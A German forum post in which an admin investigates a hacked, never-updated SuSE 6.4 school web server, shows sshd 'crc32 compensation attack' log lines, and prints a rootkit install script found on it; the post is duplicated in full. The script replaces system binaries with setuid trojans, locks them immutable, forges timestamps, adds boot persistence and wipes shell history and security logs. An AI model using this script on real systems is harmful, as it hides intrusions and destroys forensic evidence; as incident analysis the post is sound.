stefaan
11.09.02, 14:59
Servus!
Hab letztens von einem Win-Admin einen Linux-Webserver bekommen, um zu schauen, warum er nicht mehr geht ;)
Vorweg: Es PC-Händler hat einer Schule einen Webserver mit der damals aktuellen Suse 6.4 geliefert, der stand bis jetzt in der Ecke und tat seinen Dienst... Ohne Updates, ohne alles...
Jetzt hab ich ihn mir einmal angeschaut:
Ich kann mich nicht einloggen...
www login: root <enter>
www login:
Und das kommt immer wieder...
Mit Knoppix gebootet, /var/log/messages geschaut:
Jul 24 16:17:00 www sshd[20139]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:05 www sshd[20141]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:08 www sshd[20142]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:10 www sshd[20143]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:15 www sshd[20145]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:18 www sshd[20146]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:23 www sshd[20148]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:26 www sshd[20149]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:29 www sshd[20150]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:31 www sshd[20151]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:37 www sshd[20153]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:18:46 www sshd[20180]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:07 www sshd[20193]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:20 www sshd[20195]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:58 www sshd[20201]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:13 www sshd[20204]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:18 www sshd[20206]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:21 www sshd[20207]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:34 www sshd[20212]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:54 www sshd[20220]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:59 www sshd[20222]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:02 www sshd[20223]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:25 www sshd[20232]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:27 www sshd[20233]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:40 www sshd[20238]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:42 www sshd[20239]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:05 www sshd[20248]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:08 www sshd[20249]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:11 www sshd[20250]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:23:16 www sshd[20252]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:28:57 www syslogd 1.3-3: restart
Na lieb, der sshd, bei Suse 6.4 Version 1.2.2, wenn ich das richtig gefunden habe...
Im Wurzelverzeichnis hab ich noch eine Datei names kk.tgz gefunden, Google hat allerdings dazu nichts ausgespuckt.
Darin waren 27 Dateien, darunter ein Haufen Programme wie top, netstat, ls, find, du usw...
Hier das "Install-Script":
#!/bin/sh
echo " - Installation ..."
for i in {2,3,4,5}
do
cp -f S80rpcmap /etc/rc.d/rc$i.d/
done
#
mkdir /usr/doc/.spool
mkdir /usr/doc/kern
mkdir /var/log/ssh
#
cd kern
make all
mv string.o /usr/doc/kern/
mv var /usr/doc/kern/
#
cd ../ssh
mv ssh_host_key /var/log/ssh/
mv ssh_random_seed /var/log/ssh
mv squid /usr/doc/.spool/
mv squid.conf /usr/doc/.spool/
#
cd ../utils
mv sniffy sl3y show clear wpe st str.sh /usr/doc/.spool
chattr -i /usr/bin/top > /dev/null 2>&1
touch -acmr /usr/bin/top top
rm -rf /usr/bin/top
mv -f top /usr/bin/top
chmod 4555 /usr/bin/top
#
chattr -i /sbin/syslogd > /dev/null 2>&1
killall -9 syslogd
touch -acmr /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chmod 4555 /sbin/syslogd
#
chattr -i /bin/ls > /dev/null 2>&1
touch -acmr /bin/ls ls
mv -f ls /bin/ls
chmod 4555 /bin/ls
#
chattr -i /bin/netstat > /dev/null 2>&1
mkdir -p /usr/lib/kterm
chattr -i /usr/lib/kterm/.1addr > /dev/null 2>&1
chattr -i /usr/lib/kterm/.1proc > /dev/null 2>&1
mv -f .1addr /usr/lib/kterm
mv -f .1proc /usr/lib/kterm
chattr +i /usr/lib/kterm/.1addr
chattr +i /usr/lib/kterm/.1proc
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
mv -f find /usr/bin/find
chmod 4555 /bin/netstat
chmod 4555 /usr/bin/find
#
chattr -i /usr/bin/du > /dev/null 2>&1
touch -acmr /usr/bin/du du
mv -f du /usr/bin/du
chmod 4555 /usr/bin/du
#
chattr -i /usr/src/linux/arch/alpha/lib/.lib/ > /dev/null 2>&1
mkdir -p /usr/src/linux/arch/alpha/lib/.lib/
mv .1file /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/bin/top
chattr +i /bin/netstat
chattr +i /usr/bin/find
chattr +i /sbin/syslogd
#
cd ..
./debug
rm -rf S80rpcmap debug kern/ ssh/ utils/ ../r.tgz ../r2.tgz ../rk.tar.gz ../rk.tgz install
cd kern
/usr/doc/kern/var u var.c > /dev/null 2>&1
cd ../..
rm -rf rk
#news
echo "unset HISTFILE">>/etc/profile
rm -f /sbin/rpc.statd /usr/sbin/rpc.statd
rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
echo -e "\n - Gata ! - L-am Facut ! - "
Schaut also ziemlich gehackt aus :D
Leider ist das /var/log/secure weg... /usr wurde auch gelöscht... Gibts sonst noch ein Log, wo die IPs drinnen sein könnten?
Grüße, Stefan
PS: Kommt davon, wenn ein PC-Händler einfach Suse 6.4 draufspielt und vergammeln lässt :D :rolleyes: Und der Typ is Citirix Certified Admin... :rolleyes:
Grüße, Stefan
Hab letztens von einem Win-Admin einen Linux-Webserver bekommen, um zu schauen, warum er nicht mehr geht ;)
Vorweg: Es PC-Händler hat einer Schule einen Webserver mit der damals aktuellen Suse 6.4 geliefert, der stand bis jetzt in der Ecke und tat seinen Dienst... Ohne Updates, ohne alles...
Jetzt hab ich ihn mir einmal angeschaut:
Ich kann mich nicht einloggen...
www login: root <enter>
www login:
Und das kommt immer wieder...
Mit Knoppix gebootet, /var/log/messages geschaut:
Jul 24 16:17:00 www sshd[20139]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:05 www sshd[20141]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:08 www sshd[20142]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:10 www sshd[20143]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:15 www sshd[20145]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:18 www sshd[20146]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:23 www sshd[20148]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:26 www sshd[20149]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:29 www sshd[20150]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:31 www sshd[20151]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:37 www sshd[20153]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:18:46 www sshd[20180]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:07 www sshd[20193]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:20 www sshd[20195]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:58 www sshd[20201]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:13 www sshd[20204]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:18 www sshd[20206]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:21 www sshd[20207]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:34 www sshd[20212]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:54 www sshd[20220]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:59 www sshd[20222]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:02 www sshd[20223]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:25 www sshd[20232]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:27 www sshd[20233]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:40 www sshd[20238]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:42 www sshd[20239]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:05 www sshd[20248]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:08 www sshd[20249]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:11 www sshd[20250]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:23:16 www sshd[20252]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:28:57 www syslogd 1.3-3: restart
Na lieb, der sshd, bei Suse 6.4 Version 1.2.2, wenn ich das richtig gefunden habe...
Im Wurzelverzeichnis hab ich noch eine Datei names kk.tgz gefunden, Google hat allerdings dazu nichts ausgespuckt.
Darin waren 27 Dateien, darunter ein Haufen Programme wie top, netstat, ls, find, du usw...
Hier das "Install-Script":
#!/bin/sh
echo " - Installation ..."
for i in {2,3,4,5}
do
cp -f S80rpcmap /etc/rc.d/rc$i.d/
done
#
mkdir /usr/doc/.spool
mkdir /usr/doc/kern
mkdir /var/log/ssh
#
cd kern
make all
mv string.o /usr/doc/kern/
mv var /usr/doc/kern/
#
cd ../ssh
mv ssh_host_key /var/log/ssh/
mv ssh_random_seed /var/log/ssh
mv squid /usr/doc/.spool/
mv squid.conf /usr/doc/.spool/
#
cd ../utils
mv sniffy sl3y show clear wpe st str.sh /usr/doc/.spool
chattr -i /usr/bin/top > /dev/null 2>&1
touch -acmr /usr/bin/top top
rm -rf /usr/bin/top
mv -f top /usr/bin/top
chmod 4555 /usr/bin/top
#
chattr -i /sbin/syslogd > /dev/null 2>&1
killall -9 syslogd
touch -acmr /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chmod 4555 /sbin/syslogd
#
chattr -i /bin/ls > /dev/null 2>&1
touch -acmr /bin/ls ls
mv -f ls /bin/ls
chmod 4555 /bin/ls
#
chattr -i /bin/netstat > /dev/null 2>&1
mkdir -p /usr/lib/kterm
chattr -i /usr/lib/kterm/.1addr > /dev/null 2>&1
chattr -i /usr/lib/kterm/.1proc > /dev/null 2>&1
mv -f .1addr /usr/lib/kterm
mv -f .1proc /usr/lib/kterm
chattr +i /usr/lib/kterm/.1addr
chattr +i /usr/lib/kterm/.1proc
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
mv -f find /usr/bin/find
chmod 4555 /bin/netstat
chmod 4555 /usr/bin/find
#
chattr -i /usr/bin/du > /dev/null 2>&1
touch -acmr /usr/bin/du du
mv -f du /usr/bin/du
chmod 4555 /usr/bin/du
#
chattr -i /usr/src/linux/arch/alpha/lib/.lib/ > /dev/null 2>&1
mkdir -p /usr/src/linux/arch/alpha/lib/.lib/
mv .1file /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/bin/top
chattr +i /bin/netstat
chattr +i /usr/bin/find
chattr +i /sbin/syslogd
#
cd ..
./debug
rm -rf S80rpcmap debug kern/ ssh/ utils/ ../r.tgz ../r2.tgz ../rk.tar.gz ../rk.tgz install
cd kern
/usr/doc/kern/var u var.c > /dev/null 2>&1
cd ../..
rm -rf rk
#news
echo "unset HISTFILE">>/etc/profile
rm -f /sbin/rpc.statd /usr/sbin/rpc.statd
rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
echo -e "\n - Gata ! - L-am Facut ! - "
Schaut also ziemlich gehackt aus :D
Leider ist das /var/log/secure weg... /usr wurde auch gelöscht... Gibts sonst noch ein Log, wo die IPs drinnen sein könnten?
Grüße, Stefan
PS: Kommt davon, wenn ein PC-Händler einfach Suse 6.4 draufspielt und vergammeln lässt :D :rolleyes: Und der Typ is Citirix Certified Admin... :rolleyes:
Grüße, Stefan